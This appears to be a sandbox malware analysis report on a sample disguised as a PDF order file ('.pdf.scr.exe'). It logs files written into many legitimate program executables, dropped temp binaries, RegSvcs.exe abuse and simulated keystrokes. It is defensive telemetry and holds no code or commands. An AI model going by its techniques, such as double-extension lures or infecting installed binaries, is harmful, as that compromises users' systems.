Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 166400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 739916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_00468111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00468111
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Code function: 0_2_0041EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0041EB42

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Code function: 0_2_0042123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042123A

Source: C:\Users\user\AppData\Local\Temp\server02.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
